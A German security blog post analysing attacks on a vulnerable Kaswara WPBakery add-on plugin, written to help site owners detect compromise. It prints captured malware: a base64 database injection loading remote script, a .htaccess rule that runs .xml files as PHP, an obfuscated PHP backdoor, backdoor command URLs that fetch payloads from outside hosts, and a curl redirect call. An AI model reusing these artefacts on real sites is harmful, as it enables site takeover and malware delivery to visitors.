Verwundbares Kaswara Modern WPBakery Page Builder Addons Plugin wird in freier Wildbahn ausgenutzt

Bereits am 20. April 2021 haben unsere Freunde von WPScan eine schwerwiegende Schwachstelle in Kaswara Modern VC Add-ons gemeldet, auch bekannt als Kaswara Modern WPBakery Page Builder-Add-ons. Es ist bei Codecanyon/Envato nicht mehr verfügbar, was bedeutet, dass Sie, wenn Sie es ausführen, eine Alternative wählen müssen.

Diese Schwachstelle ermöglicht es nicht authentifizierten Benutzern, beliebige Dateien in das Icon-Verzeichnis des Plugins (./wp-content/uploads/kaswara/icons) hochzuladen. Dies ist der erste Indicator Of Compromise (IOC), den unsere Freunde bei WPScan in ihrem Bericht mit uns geteilt haben.

Die Möglichkeit, beliebige Dateien auf eine Website hochzuladen, gibt dem Angreifer die volle Kontrolle über die Website, was es schwierig macht, die endgültige Nutzlast dieser Infektion zu definieren; daher zeigen wir Ihnen alles, was wir bisher gefunden haben (wir haben uns ein wenig von der Recherche mitreißen lassen, also fühlen Sie sich frei, zum IOC-Bereich zu springen, wenn Sie nicht durchlesen möchten).

Datenbankinjektion, gefälschte Android-Apps und andere Hintertüren

Vielen Dank an unseren Freund Denis Sinegubko von Sucuri für den Hinweis auf die bei diesem Angriff verwendete Datenbankinjektions-Nachverfolgung.

Angreifer würden die Option „kaswara-customJS“ aktualisieren, um ein willkürliches bösartiges JavaScript-Code-Snippet hinzuzufügen. Hier ist ein Beispiel, das wir gefunden haben:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Diese base64-codierte Zeichenfolge bedeutet:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

Und wie es bei dieser Art von Skript üblich ist, lädt es eine Reihe anderer Javascript-Code-Snippets und die endgültige Nutzlast ist entweder ein Malvertising oder ein Exploit-Kit. Dies ist dem, was Wordfence hier berichtet, sehr ähnlich.

In diesem Fall stirbt das Skript auf hxxp://double-clickd[.]com/ und lädt keine schlechten Inhalte. Ich habe verdächtiges Javascript gefunden, das diese Seite seit Anfang 2020 aufruft, und Leute haben es bereits seit 2018 blockiert.

Gefälschte Apps, die auf die Website hochgeladen wurden

Die 40 Android-Apps, die auf den von uns untersuchten Websites gefunden wurden, waren gefälschte Versionen verschiedener Apps, wie AliPay, PayPal, Correos, DHL und viele andere, die laut dieser VirusTotal-Analyse glücklicherweise von den beliebtesten Antiviren-Anbietern entdeckt wurden.

Ich habe die Absichten der App nicht überprüft, aber ein kurzer Überblick über die angeforderten Berechtigungen kann uns einen Eindruck davon geben, was sie tun könnte:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Diese Dateien werden jedoch nicht sofort mit dem Kaswara-Exploit hochgeladen. Nachdem die Website kompromittiert wurde, laden die Angreifer zunächst andere Tools hoch, um die Website vollständig zu kontrollieren.

Hochgeladene Dateien

Einige Backdoors und andere Malware wurden auch auf Websites gefunden, die von dieser Schwachstelle betroffen sind. Ich werde in diesem Beitrag eine kurze Analyse der beliebtesten und interessantesten veröffentlichen. Ich möchte mich jedoch zunächst auf die komplexeste konzentrieren.

Umleitungs- und gefälschte Apps

Die gefälschten Apps, die ich auf mehreren kompromittierten Websites gefunden habe, wurden nicht durch Ausnutzen der Kaswara-Schwachstelle hochgeladen. Sie werden mithilfe eines multifunktionalen Hacktools auf die Website hochgeladen, das es dem Angreifer ermöglicht, einen Remote-Code hochzuladen (durch Angabe einer URL oder Zeichenfolge) und den Benutzer auf eine bösartige Website umzuleiten.

Die Datei kann leicht anhand dieser Zeichenfolge identifiziert werden: base64_decode('MTIz');error_reporting(0); Funktion

Interessanterweise randomisiert es alles andere außer diesem.

Die Malware befindet sich in einer einzigen Zeile, was auch ein interessantes IOC ist, wenn Sie nach dieser Art von Codeanomalie suchen.

Um es verständlicher zu machen, habe ich die meisten Teile des Codes entschlüsselt, die interessanten Funktionen umbenannt und den Code verschönert. Die Malware enthält 6 verschiedene Funktionen, von denen 5 auf den Werten basieren, die an die Variable $_GET['ts'] werden. Betrachten wir für dieses Dokument eine der vielen Instanzen, die ich gefunden habe: c.php .

/c.php?ts=kt

Dies bewirkt nichts und zwingt die Site, einen 500-Fehler zurückzugeben (später im Code).

/c.php?ts=1

Ändert den Wert des $q1a Flags auf true, um eine Codevalidierung durchzuführen und eine OK-Meldung an den Angreifer auszugeben.

In diesem Fall antwortet die Gegenstelle: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v="Code"&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Schreibt eine Datei auf den Server mit Code, der durch den Inhalt von $_GET["v"] bereitgestellt wird, solange $_GET["p"] die SHA1-Prüfsumme von 123 ist (erinnern Sie sich an den ersten IOC von base64_decode('MTIz') ? this ist das die Prüfsumme).

/c.php?ts=tt

Schreibt 5 MB „-“ auf den Server, vermutlich um zu testen, ob die Upload-Funktion auf dem Server funktioniert.

/c.php?ts=dwm&h=HASH1,HASH2

Wenn die Malware diese Anfrage erhält, führt sie einen Test durch, um zu überprüfen, ob hochgeladene Dateien erfolgreich auf den Server geschrieben wurden. Ihre MD5-Hashes müssen bekannt sein und werden als kommagetrennte Werte an die Variable $_GET['h'] gesendet.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Lädt eine Datei von einer Reihe von Websites Dritter herunter und speichert sie auf dem Server, der sie nach den letzten 12 Zeichen der md5 der heruntergeladenen Datei benennt.

Dies ist die Funktion, die verwendet wird, um gefälschte Apps auf den Server hochzuladen.

Hier ist ein Beispiel für die Anfrage zum Herunterladen schädlicher Dateien /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Zugriff umleiten

Wenn die Option kt oder keine Option ausgewählt wurde, fährt der Code mit der Umleitung fort, die durch Anfordern eines JSON-Blobs mit den erforderlichen Daten erreicht wird. Anschließend leitet es den Besucher über die Header-Funktion weiter.

Die Antwort lautet wie folgt: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Die Funktion zum Ausführen einer cURL-Anfrage mit den erforderlichen Parametern ist diese: Nichts Besonderes…

Und es kann in diese cURL-Anfrage übersetzt werden:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

Die endgültige URL ist, soweit ich das testen konnte, zufällig, hat aber die gleiche Eigenschaft, eine gefälschte Seite für einen beliebten Dienst oder eine App zu sein.

wp-content/uploads/kaswara/icons/16/javas.xml und wp-content/uploads/kaswara/icons/16/.htaccess

Eine XML-Datei wird normalerweise nicht als potenzielle Bedrohung markiert, aber in diesem Fall haben wir eine speziell gestaltete .htaccess-Datei, die ändert, wie der Webserver sie sieht:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

Tatsächlich weist es Apache an, alle Java-, Home- oder Menüdateien mit xml, php oder pdf als PHP-Datei zu verstehen, die entsprechend verarbeitet und ausgeführt werden muss. Daher ist jede dieser Dateien, die sich in derselben Verzeichnisstruktur wie diese .htaccess befinden, verdächtig.

Die Datei javas.xml ist die gleiche wie einige andere bösartige Dateien, die auf die Website hochgeladen wurden. Ich habe festgestellt, dass der Unterschied darin besteht, dass einige eine oder zwei Leerzeilen am Ende der Datei haben, was das traditionelle Hashing etwas schwieriger macht.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Der bösartige Code wird mit str_rot13- und base64-codierten Zeichenfolgen verschleiert. Es verwendet auch Hexadezimalwerte und mathematische Operationen, um die Zeichenfolgen ein wenig mehr zu verbergen. Die endgültige Nutzlast ist unbekannt, da sie eine Funktion basierend auf den Werten einer POST-Anforderung erstellt. Die Nutzlast scheint jedoch jedes Mal gleich zu sein, da sie sich auf eine md5-Prüfung stützt, bevor sie erstellt wird (c42ea979ed982c02632430e9e98a66d6 ist der md5-Hash).

Fazit

Da es sich um eine aktive Kampagne handelt, finden wir zum Zeitpunkt des Schreibens dieses Beitrags immer mehr verschiedene Malware-Beispiele, die auf den betroffenen Websites abgelegt werden. Einige sind nur Variationen dessen, was wir hier haben, während andere interessant genug für eine tiefere Analyse sind. Suchen Sie in Kürze nach einigen kleineren Beiträgen, um einige dieser anderen Beispiele zu erkunden.

Dies zeigt, wie wichtig es ist, Ihre Erweiterungen mit den neuesten Sicherheitsfixes zu aktualisieren. Wenn die Entwickler Fixes nicht rechtzeitig veröffentlichen oder es aus dem WordPress.org-Repository (oder anderen Marktplätzen) entfernt wird, empfehlen wir Ihnen dringend, eine sicherere Alternative dazu zu finden.

Wenn Sie sich Sorgen über Malware und Schwachstellen für Ihre Website machen, sehen Sie sich die Sicherheitsfunktionen von Jetpack an. Jetpack Security bietet einfach zu bedienende, umfassende WordPress-Site-Sicherheit, einschließlich Backups, Malware-Scans und Spam-Schutz.

Indikatoren für Kompromisse

Hier finden Sie die vollständige Liste aller von uns identifizierten IOCs: